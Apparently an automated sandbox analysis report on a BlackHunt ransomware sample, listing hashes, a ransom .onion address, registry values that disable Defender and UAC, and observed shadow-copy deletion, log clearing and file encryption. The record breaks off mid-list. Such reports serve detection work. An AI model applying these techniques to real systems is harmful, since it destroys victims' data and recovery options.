Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 01:28
Static task
static1
Behavioral task
behavioral1
Sample
f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe
Resource
win10v2004-20231222-en
General
-
Target
f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe
-
Size
707KB
-
MD5
dc0f6378a2cc070250c5a7da3be447cb
-
SHA1
01eac35464013979f761ead5354ba29769019a58
-
SHA256
f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015
-
SHA512
2d44642fed2b9b43feca54bf164e65913b202f901d0728aaea38bf44310b05e49ca9813eae01b7784e0b1380743f6b60aa71c6e4b491021ca5762b4b1cab060e
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1F8kvnh:6uaTmkZJ+naie5OTamgEoKxLWoah
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2848 fsutil.exe 3108 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" conhost.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3120 wevtutil.exe 3512 wevtutil.exe 1976 wevtutil.exe 3188 wevtutil.exe 3136 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 808 bcdedit.exe 1756 bcdedit.exe 2176 bcdedit.exe 768 bcdedit.exe -
Renames multiple (2887) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1976 wbadmin.exe 3036 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 1196 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\V: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\O: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\S: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\Z: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\W: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\R: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\I: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\U: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\A: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\Q: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\E: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\H: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\N: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Y: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\G: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\L: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\P: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\J: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\K: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\M: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\B: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\ConnectExit.mpg f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jre7\lib\psfont.properties.ja f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jakarta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Regina f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Denver f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-io.xml f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-next-static.png f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\ZoneInfoMappings f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\si\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToScenesBackground_PAL.wmv f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UTC f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Esl\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-ui.jar f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3252 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2272 vssadmin.exe 3528 vssadmin.exe 3696 vssadmin.exe 3900 vssadmin.exe 2092 vssadmin.exe 2016 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1660 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2884 PING.EXE -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeRestorePrivilege 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeBackupPrivilege 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeTakeOwnershipPrivilege 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeAuditPrivilege 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeSecurityPrivilege 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeIncBasePriorityPrivilege 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeBackupPrivilege 3832 vssvc.exe Token: SeRestorePrivilege 3832 vssvc.exe Token: SeAuditPrivilege 3832 vssvc.exe Token: SeBackupPrivilege 3340 wbengine.exe Token: SeRestorePrivilege 3340 wbengine.exe Token: SeSecurityPrivilege 3340 wbengine.exe Token: SeSecurityPrivilege 3512 wevtutil.exe Token: SeBackupPrivilege 3512 wevtutil.exe Token: SeSecurityPrivilege 3120 wevtutil.exe Token: SeBackupPrivilege 3120 wevtutil.exe Token: SeSecurityPrivilege 1976 wevtutil.exe Token: SeBackupPrivilege 1976 wevtutil.exe Token: SeSecurityPrivilege 3136 wevtutil.exe Token: SeBackupPrivilege 3136 wevtutil.exe Token: SeSecurityPrivilege 3188 wevtutil.exe Token: SeBackupPrivilege 3188 wevtutil.exe Token: SeDebugPrivilege 1660 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2128 wrote to memory of 112 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 31 PID 2128 wrote to memory of 112 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 31 PID 2128 wrote to memory of 112 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 31 PID 2128 wrote to memory of 112 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 31 PID 2128 wrote to memory of 2084 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 30 PID 2128 wrote to memory of 2084 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 30 PID 2128 wrote to memory of 2084 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 30 PID 2128 wrote to memory of 2084 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 30 PID 112 wrote to memory of 2408 112 cmd.exe 34 PID 112 wrote to memory of 2408 112 cmd.exe 34 PID 112 wrote to memory of 2408 112 cmd.exe 34 PID 2128 wrote to memory of 2708 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 33 PID 2128 wrote to memory of 2708 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 33 PID 2128 wrote to memory of 2708 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 33 PID 2128 wrote to memory of 2708 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 33 PID 2084 wrote to memory of 2816 2084 cmd.exe 38 PID 2084 wrote to memory of 2816 2084 cmd.exe 38 PID 2084 wrote to memory of 2816 2084 cmd.exe 38 PID 2128 wrote to memory of 2820 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 37 PID 2128 wrote to memory of 2820 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 37 PID 2128 wrote to memory of 2820 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 37 PID 2128 wrote to memory of 2820 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 37 PID 2128 wrote to memory of 2812 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 46 PID 2128 wrote to memory of 2812 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 46 PID 2128 wrote to memory of 2812 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 46 PID 2128 wrote to memory of 2812 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 46 PID 2128 wrote to memory of 2036 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 39 PID 2128 wrote to memory of 2036 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 39 PID 2128 wrote to memory of 2036 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 39 PID 2128 wrote to memory of 2036 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 39 PID 2128 wrote to memory of 2716 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 41 PID 2128 wrote to memory of 2716 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 41 PID 2128 wrote to memory of 2716 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 41 PID 2128 wrote to memory of 2716 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 41 PID 2708 wrote to memory of 2876 2708 cmd.exe 43 PID 2708 wrote to memory of 2876 2708 cmd.exe 43 PID 2708 wrote to memory of 2876 2708 cmd.exe 43 PID 2128 wrote to memory of 2636 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 42 PID 2128 wrote to memory of 2636 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 42 PID 2128 wrote to memory of 2636 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 42 PID 2128 wrote to memory of 2636 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 42 PID 2820 wrote to memory of 2872 2820 cmd.exe 45 PID 2820 wrote to memory of 2872 2820 cmd.exe 45 PID 2820 wrote to memory of 2872 2820 cmd.exe 45 PID 2128 wrote to memory of 2628 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 53 PID 2128 wrote to memory of 2628 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 53 PID 2128 wrote to memory of 2628 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 53 PID 2128 wrote to memory of 2628 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 53 PID 2128 wrote to memory of 2512 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 47 PID 2128 wrote to memory of 2512 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 47 PID 2128 wrote to memory of 2512 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 47 PID 2128 wrote to memory of 2512 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 47 PID 2128 wrote to memory of 2844 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 49 PID 2128 wrote to memory of 2844 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 49 PID 2128 wrote to memory of 2844 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 49 PID 2128 wrote to memory of 2844 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 49 PID 2812 wrote to memory of 2644 2812 cmd.exe 50 PID 2812 wrote to memory of 2644 2812 cmd.exe 50 PID 2812 wrote to memory of 2644 2812 cmd.exe 50 PID 2128 wrote to memory of 2168 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 54 PID 2128 wrote to memory of 2168 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 54 PID 2128 wrote to memory of 2168 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 54 PID 2128 wrote to memory of 2168 2128 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 54 PID 2128 wrote to memory of 2664 2128 